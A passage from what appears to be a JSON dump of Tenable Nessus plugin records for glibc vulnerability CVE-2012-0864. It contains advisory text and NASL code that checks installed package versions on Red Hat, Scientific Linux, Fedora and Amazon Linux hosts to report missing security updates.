allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain a patch to resolve this issue.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1203&L=scientific-linux-errata&T=0&P=1866\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?058a6f9a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"glibc-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-common-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-debuginfo-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-debuginfo-common-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-devel-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-headers-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-utils-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"nscd-2.5-81.el5_8.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-25T09:14:00", "description": "Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain a patch to resolve this issue.", "edition": 19, "published": "2012-03-20T00:00:00", "title": "RHEL 5 : glibc (RHSA-2012:0397)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "modified": "2012-03-20T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "id": "REDHAT-RHSA-2012-0397.NASL", "href": "https://www.tenable.com/plugins/nessus/58394", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0397. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58394);\n script_version (\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2012-0864\");\n script_bugtraq_id(52201);\n script_xref(name:\"RHSA\", value:\"2012:0397\");\n\n script_name(english:\"RHEL 5 : glibc (RHSA-2012:0397)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain a patch to resolve this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0397\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0864\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/03/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0397\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-common-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-common-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-common-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-debuginfo-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-devel-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-headers-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-headers-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-utils-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-utils-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"nscd-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"nscd-2.5-81.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"nscd-2.5-81.el5_8.1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:23", "description": "Avoid 'nargs' integer overflow which can be used to bypass\nFORTIFY_SOURCE protections.\n\nRevert changes for 552960, they're still causing problems.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2012-02-27T00:00:00", "title": "Fedora 16 : glibc-2.14.90-24.fc16.6 (2012-2162)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "modified": "2012-02-27T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:glibc", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2012-2162.NASL", "href": "https://www.tenable.com/plugins/nessus/58124", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-2162.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58124);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-0864\");\n script_xref(name:\"FEDORA\", value:\"2012-2162\");\n\n script_name(english:\"Fedora 16 : glibc-2.14.90-24.fc16.6 (2012-2162)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Avoid 'nargs' integer overflow which can be used to bypass\nFORTIFY_SOURCE protections.\n\nRevert changes for 552960, they're still causing problems.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=794797\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-February/073668.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?15ad6906\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected glibc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"glibc-2.14.90-24.fc16.6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:23", "description": "Avoid 'nargs' integer overflow which can be used to bypass\nFORTIFY_SOURCE protections.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 15, "published": "2012-03-08T00:00:00", "title": "Fedora 15 : glibc-2.14.1-6 (2012-2144)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "modified": "2012-03-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:glibc", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2012-2144.NASL", "href": "https://www.tenable.com/plugins/nessus/58278", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-2144.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58278);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-0864\");\n script_bugtraq_id(52201);\n script_xref(name:\"FEDORA\", value:\"2012-2144\");\n\n script_name(english:\"Fedora 15 : glibc-2.14.1-6 (2012-2144)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Avoid 'nargs' integer overflow which can be used to bypass\nFORTIFY_SOURCE protections.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=794797\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-March/074691.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ca822fec\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-March/074746.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8f12fed9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected glibc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/03/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"glibc-2.14.1-6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:23", "description": "Various bugfixes and security enhancements.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2012-02-29T00:00:00", "title": "Fedora 17 : glibc-2.15-23.fc17 (2012-2123)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "modified": "2012-02-29T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:glibc"], "id": "FEDORA_2012-2123.NASL", "href": "https://www.tenable.com/plugins/nessus/58157", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-2123.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58157);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-0864\");\n script_xref(name:\"FEDORA\", value:\"2012-2123\");\n\n script_name(english:\"Fedora 17 : glibc-2.15-23.fc17 (2012-2123)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Various bugfixes and security enhancements.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=794797\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-February/074042.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ef34f58d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected glibc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"glibc-2.15-23.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:18:13", "description": "An integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)", "edition": 23, "published": "2013-09-04T00:00:00", "title": "Amazon Linux AMI : glibc (ALAS-2012-57)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:glibc-debuginfo", "p-cpe:/a:amazon:linux:glibc-devel", 